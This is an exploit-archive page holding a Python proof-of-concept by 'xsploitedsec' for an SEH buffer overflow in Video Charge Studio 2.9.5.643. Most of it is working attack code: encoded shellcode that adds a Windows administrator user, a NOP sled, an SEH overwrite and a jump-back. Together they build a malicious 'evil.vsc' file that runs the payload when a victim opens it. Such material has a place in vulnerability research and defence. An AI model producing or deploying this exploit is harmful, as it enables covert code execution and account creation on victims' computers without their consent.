ExploitFixes
Video Charge Studio <= 2.9.5.643 (.vsc) Buffer Overflow (SEH) 2010-12-06 09:16:35

#!/usr/bin/python
# Exploit Title: Video Charge Studio &lt;= 2.9.5.643 (.vsc) Buffer Overflow (SEH)
# Date: 12/05/2010
# Author: xsploitedsec
# URL: http://www.x-sploited.com/
# Contact: xsploitedsecurity [at] x-sploited.com
# Software Link: http://www.videocharge.com/download/VideoChargeStudio_Install.exe
# Version: &lt;= 2.9.5.643 (Latest)
# Tested on: Windows XP SP3 (Physical machine)
# CVE: N/A

### Software Description: ###
# Videocharge Studio is a video editing software which is intended for those users who
# regularly work with video, create Internet video galleries, convert video files.
# Videocharge Studio includes all features for video editing: video converting, splitting
# video into parts, joining several video files into a single one, adding watermark on
# video or image (add logo to video or photo), embedding image into video file, creating
# video from several images, editing audio. Videocharge Studio can edit video without
# reencoding as well.

### Exploit information: ###
# Video Charge Studio is prone to a buffer overflow when parsing a malicious vsc files
# &quot;Filename&quot; value field.
# An attacker could trick a user into loading a specially crafted vsc file to execute
# arbitrary code on a users PC without there consent.

### Shouts: ###
# kaotix, sheep, deca, havalito, corelanc0d3r/corelan team, exploit-db crew, packetstormsecurity
# Have fun!

# &quot;When you know that you're capable of dealing with whatever comes, you have the only
# security the world has to offer.&quot; -Harry Browne

import struct
import sys

about = &quot;=================================================\n&quot;
about += &quot; Video Charge Studio &lt;= 2.9.5.643 (.vsc) BoF (SEH)\n&quot;
about += &quot; Author: xsploited security\n URL: http://www.x-sploited.com/\n&quot;
about += &quot; Contact: xsploitedsecurity [at] gmail.com\n&quot;
about += &quot;=================================================\n&quot;
print about

# msfpayload windows/adduser user=xsploited pass=sec EXITFUNC=seh
# R | msfencode -e x86/fnstenv_mov -c 1 -t perl -b '\x00\x09\x0a
# \x0d\x3e\x3c\x26\x20\x21\x22\x23\x2a\x07' &gt; /tmp/encoded.txt
# [*] x86/fnstenv_mov succeeded with size 302 (iteration=1)

shellcode = (
&quot;\x6a\x46\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xce&quot;
&quot;\xcf\xb0\x91\x83\xeb\xfc\xe2\xf4\x32\x27\x39\x91\xce\xcf&quot;
&quot;\xd0\x18\x2b\xfe\x62\xf5\x45\x9d\x80\x1a\x9c\xc3\x3b\xc3&quot;
&quot;\xda\x44\xc2\xb9\xc1\x78\xfa\xb7\xff\x30\x81\x51\x62\xf3&quot;
&quot;\xd1\xed\xcc\xe3\x90\x50\x01\xc2\xb1\x56\x2c\x3f\xe2\xc6&quot;
&quot;\x45\x9d\xa0\x1a\x8c\xf3\xb1\x41\x45\x8f\xc8\x14\x0e\xbb&quot;
&quot;\xfa\x90\x1e\x9f\x3b\xd9\xd6\x44\xe8\xb1\xcf\x1c\x53\xad&quot;
&quot;\x87\x44\x84\x1a\xcf\x19\x81\x6e\xff\x0f\x1c\x50\x01\xc2&quot;
&quot;\xb1\x56\xf6\x2f\xc5\x65\xcd\xb2\x48\xaa\xb3\xeb\xc5\x73&quot;
&quot;\x96\x44\xe8\xb5\xcf\x1c\xd6\x1a\xc2\x84\x3b\xc9\xd2\xce&quot;
&quot;\x63\x1a\xca\x44\xb1\x41\x47\x8b\x94\xb5\x95\x94\xd1\xc8&quot;
&quot;\x94\x9e\x4f\x71\x96\x90\xea\x1a\xdc\x24\x36\xcc\xa4\xce&quot;
&quot;\x3d\x14\x77\xcf\xb0\x91\x9e\xa7\x81\x1a\xa1\x48\x4f\x44&quot;
&quot;\x75\x31\xbe\xa3\x24\xa7\x16\x04\x73\x52\x4f\x44\xf2\xc9&quot;
&quot;\xcc\x9b\x4e\x34\x50\xe4\xcb\x74\xf7\x82\xbc\xa0\xda\x91&quot;
&quot;\x9d\x30\x65\xf2\xa3\xab\x9e\xf4\xb6\xaa\x90\xbe\xad\xef&quot;
&quot;\xde\xf4\xba\xef\xc5\xe2\xab\xbd\x90\xe9\xbd\xbf\xdc\xfe&quot;
&quot;\xa7\xbb\xd5\xf5\xee\xbc\xd5\xf2\xee\xe0\xf1\xd5\x8a\xef&quot;
&quot;\x96\xb7\xee\xa1\xd5\xe5\xee\xa3\xdf\xf2\xaf\xa3\xd7\xe3&quot;
&quot;\xa1\xba\xc0\xb1\x8f\xab\xdd\xf8\xa0\xa6\xc3\xe5\xbc\xae&quot;
&quot;\xc4\xfe\xbc\xbc\x90\xe9\xbd\xbf\xdc\xfe\xa7\xbb\xd5\xf5&quot;
&quot;\xee\xe0\xf1\xd5\x8a\xcf\xba\x91&quot;
);

header = (
&quot;\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30&quot;
&quot;\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x57\x69\x6e\x64\x6f\x77\x73\x2d&quot;
&quot;\x31\x32\x35\x32\x22\x20\x3f\x3e\x3c\x63\x6f\x6e\x66\x69\x67\x20\x76\x65\x72\x3d&quot;
&quot;\x22\x32\x2e\x39\x2e\x35\x2e\x36\x34\x33\x22\x3e\x0d\x0a\x3c\x63\x6f\x6c\x73\x20&quot;
&quot;\x6e\x61\x6d\x65\x3d\x22\x46\x69\x6c\x65\x73\x22\x2f\x3e\x0d\x0a\x3c\x63\x6f\x6c&quot;
&quot;\x73\x20\x6e\x61\x6d\x65\x3d\x22\x50\x72\x6f\x66\x69\x6c\x65\x73\x22\x3e\x0d\x0a&quot;
&quot;\x3c\x50\x72\x6f\x70\x65\x72\x74\x79\x20\x6e\x61\x6d\x65\x3d\x22\x50\x72\x6f\x66&quot;
&quot;\x69\x6c\x65\x22\x3e\x0d\x0a\x3c\x63\x6f\x6c\x73\x20\x6e\x61\x6d\x65\x3d\x22\x46&quot;
&quot;\x6f\x72\x6d\x61\x74\x73\x22\x3e\x0d\x0a\x3c\x50\x72\x6f\x70\x65\x72\x74\x79\x20&quot;
&quot;\x6e\x61\x6d\x65\x3d\x22\x46\x6f\x72\x6d\x61\x74\x22\x3e\x0d\x0a\x3c\x56\x61\x6c&quot;
&quot;\x75\x65\x20\x6e\x61\x6d\x65\x3d\x22\x4e\x61\x6d\x65\x22\x20\x74\x79\x70\x65\x3d&quot;
&quot;\x22\x38\x22\x20\x76\x61\x6c\x75\x65\x3d\x22&quot;
);

footer = (
&quot;\x22\x2f\x3e\x0d\x0a\x3c\x2f\x50\x72\x6f\x70\x65\x72\x74\x79\x3e\x0d\x0a&quot;
&quot;\x3c\x2f\x63\x6f\x6c\x73\x3e\x0d\x0a\x3c\x2f\x50\x72\x6f\x70\x65\x72\x74\x79\x3e\x0d&quot;
&quot;\x0a\x3c\x2f\x63\x6f\x6c\x73\x3e\x0d\x0a\x3c\x2f\x63\x6f\x6e\x66\x69\x67\x3e&quot;
);

size = 824; #824 junk bytes triggers the bof

payload = &quot;\x90&quot; * (size - len(shellcode));
payload += shellcode

payload += &quot;\xEB\x06\x90\x90&quot;; #jmp short
payload += struct.pack(&quot;&lt;L&quot;,0x61B8451C); #universal p/p/r - zlib1.dll (Apps path)
payload += &quot;\xe9\xe0\xfc\xff\xff&quot;; #jmp back 800 bytes

xsploit = header + payload + footer;

print(&quot;[*] Creating .vsc file&quot;);
print &quot;[*] Payload size = &quot; + str(len(payload)) + &quot; bytes&quot;;

try:
out_file = open(&quot;evil.vsc&quot;,'w');
out_file.write(xsploit);
out_file.close();
print(&quot;[*] Malicious vsc file created successfully&quot;);
print(&quot;[*] Launch Video Charge Studio and load the file\n[*] Exiting...\r\n&quot;);
except:
print &quot;[!] Error creating file&quot;;